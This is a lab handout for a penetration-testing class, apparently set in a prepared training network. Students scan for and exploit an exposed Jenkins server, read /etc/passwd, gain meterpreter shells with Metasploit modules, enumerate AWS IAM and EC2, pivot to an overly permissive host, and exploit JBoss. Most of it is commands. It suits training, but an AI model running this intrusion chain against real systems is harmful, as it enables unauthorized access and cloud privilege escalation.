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Lab 2

Table of Contents

Network Penetration

In this lab, we will be exploiting a popular Build Platform and use it to pivot deeper into the network.



Find a vulnerable host.

  1. Install Nmap.
$ sudo yum -y install nmap
  1. Port scan a vulnerable host.
$ nmap -PN -p8080 -sV

Exploiting Jenkins Manually

  1. Load on your browser.

  2. Select New Item, enter your student ID under Item name and select Freestyle project. Click OK.

  3. Under Build, click Add a build step, select Execute shell. In the Command text box enter cat /etc/passwd and click Save.

  4. Select Build Now, then click the last Build History job and click Console Output. What do you see? Would you put this host on the internet as is?

  5. Go back to your project and click Configure run other commands such as whoami, pwd and ps to familiarize yourself with this host. What flavor of linux is this? What packages are installed?

Introducing Metasploit

  1. Install Metasploit.

Download and extract the Metasploit package from the DSO bucket: dso-public-bucket

$ curl -O
$ unzip

Alternatively clone the Metasploit Git project directly.

$ git clone
  1. Install dependencies and run msfconsole.
$ cd metasploit-framework-master
$ sudo yum -y install libpcap-devel postgresql-devel libsqlite3-dev sqlite-devel
$ bundle install
$ ./msfconsole

# cowsay++
< metasploit >
     \   ,__,
      \  (oo)____
         (__)    )\
            ||--|| *

     =[ metasploit v4.12.10-dev                         ]
+ -- --=[ 1556 exploits - 902 auxiliary - 268 post        ]
+ -- --=[ 438 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: ]

msf >

Exploiting Jenkins with Metasploit

  1. Search for the Jenkins-CI Script-Console Java Execution exploit. You can do this using the search keyword.

  2. Configure the exploit for use.

In the example below we are using TCP port 10001 to create a listener (LPORT). Please contact the instructor to see which port you should be using.

> use exploit/multi/http/jenkins_script_console
> show options
> set RHOST
> set RPORT 8080
> set target 1
> set payload linux/x86/meterpreter/bind_tcp
> set LPORT 10001
  1. Exploit the target and run the shell.
> exploit
> shell
  1. Run the AWS CLI to determine if this host has IAM permissions.
$ aws iam list-users --region us-west-2
  1. Since this host does not have IAM privileges, let's find a host that does.

Run the AWS CLI to determine the IP address of another host that may have an overly permissive instance profile/role.

$ aws ec2 describe-instances --region us-west-2

Is that shot of JSON to the eye? Try filtering the results, like this:

aws ec2 describe-instances --region us-west-2 --filters Name=iam-instance-profile.arn,Values=arn:aws:iam::717986480831:instance-profile/dso-overly-permissive

Make note of this host's IP address. This is target 2.

Throw the shell into the background by pressing ctrl-z, followed by y and ENTER. Also throw the Meterpreter shell into the background by again pressing ctrl-z, followed by y and ENTER. Then list your sessions.

> sessions

Make note of the session ID, e.g., 1.


  1. Add a route to pivot to a host that is deeper inside the network (target 2).


> route add 1
> route print
  1. Scan the host you discovered for vulnerabilities.
> use auxiliary/scanner/http/jboss_vulnscan
> show options
> set RHOSTS
> set RPORT 8080
> show options
> run
  1. Search for the JBoss DeploymentFileRepository WAR Deployment exploit. E.g., search JMXInvokerServlet.

  2. Configure the exploit.

Use this formula to determine the value for LPORT. LPORT = 10000 + Student ID number. So, student 1, LPORT would be 10001.

> use exploit/multi/http/jboss_invoke_deploy
> set RHOST
> set target 1
> set payload java/meterpreter/bind_tcp
> set LPORT 10001
> exploit
  1. Run the AWS CLI to determine if this host has IAM permissions.
> shell
python -c 'import pty; pty.spawn("/bin/bash")'
$ export http_proxy=http://proxy:3128
$ export https_proxy=http://proxy:3128
$ aws iam list-users --region us-west-2

What does this mean?